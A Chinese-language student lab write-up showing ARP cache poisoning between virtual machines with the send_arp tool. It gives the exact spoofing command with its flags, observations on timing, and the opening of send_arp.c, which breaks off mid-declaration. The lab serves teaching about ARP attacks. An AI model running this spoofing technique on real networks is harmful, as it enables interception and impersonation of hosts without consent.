|
总目标
写一个抓包工具
小实验2.ARP欺骗实验
1.实验:ARP欺骗之send_arp
2. 实验平台:Linux (RedHat5)
3.实验目的:通过对send_arp程序的使用,了解ARP包的基本构造,以及局域网中ARP病毒的原理。
4.预期结果:通过使用send_arp程序,更改被“骗”主机的ARP表,以达到欺骗目的。
5.实验步骤:
1、在虚拟机中创建三个Linux系统,分别为A、B、C。(在本实验中以A冒充B的身份来欺骗C)
2、在以上三个虚拟机中分别输入ifconfig,得到ip和mac地址。
3、在C下分别ping主机A和B,然后输入arp -a得到ARP表,记录下来IPA对应的MAC地址,以及IPB对应的MAC地址。(所得到的ip和mac对应关系正确标志着实际情况下A、B的ip和mac对应关系)。
4、在A下启动send_arp程序,在shell命令提示符下的命令行为send_arp -p IP_B -h MAC_A -P IP_C -H MAC_C -t 2 -v
解释:发送ARP包,-p对应的是ARP包中显示的发送方ip,-h对应的是ARP包中显示的发送方的MAC,-P对应的是ARP包中所显示的目的IP地址,-H对应的是ARP包中所显示的目的MAC地址,-t对应的是该ARP类型,其中-t后跟的2表明该ARP包属于应答包,-v表示的是回显该ARP包中所包含的基础信息。
5、在C下再次输入arp -a,记录所得到的ARP表,显示发现本来IP_B对应的MAC_B,变成了和MAC_A所对应。
实验原理图: 
实验要点
1.该实验至少需要两台电脑,被攻击的C和攻击者A
2.在我做的实验中,攻击者为linux下红帽子系统,被攻击者为win2003系统,这两台电脑在一个小型局域网中。换到我们自己的电脑上做实验的时候,ubuntu系统和windows系统无法ping通。
3.因为我们所发送的包为应答包,所以我们应该在主机Cping通主机B后,再立刻攻击主机C,否则攻击将会无效。我猜测这时候主机C应该是默认不接受应答包的。
代码部分
/* Send_arp.c */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define DEBUG 1
char usage[] = {
"sendarp: send an arp packet\n usage: sendarp [-?] [-v] [-t message_type] [-i interface]\n [-p sender_protocol_address] [-P target_protocol_address]\n [-h sender_hardware_address] [-H target_hardware_address] [-v]\n \n -? display this message\n -v verbose Default: not verbose\n Be verbose\n \n -t message type Default: 1\n Identifies the purpose for this ARP packet\n 1 ARP Request\n 2 ARP Response\n 3 Reverse ARP Request\n 4 Reverse ARP Response\n 8 Inverse ARP Request\n 9 Inverse ARP Response\n \n -i interface Default: eth0\n Select an interface (eth1, lo, ppp0, whatever...)\n \n -p sender protocol address Default: 0.0.0.0\n Identifies the ip address of the system issuing the ARP packet.\n \n -P target protocol address Default: 0.0.0.0\n Identifies the ip address of the ARP packet's destination.\n \n -h sender hardware address Default: 00:00:00:00:00:00\n Identifies the hardware address of the system issuing the ARP packet.\n \n -H target hardware address Default: 00:00:00:00:00:00\n Identifies the hardware address of the ARP packet's destination.\n \n Bugs:\n if you find any please email ;\n thanks.\n Author(s):\n Derived from send_arp.c by Yuri Volobuev ; 1997\n Modified by Jonthan R. Seagrave ; 14 Sep 2000\n \n"};
struct arp_packet {
u_char dst_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short type;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};
void send_arp(char *src_ip, char *src_hw_addr, char *dst_ip, char *dst_hw_addr, char *interface, u_short type);
void die(char *);
void get_ip_addr(struct in_addr*,char*
|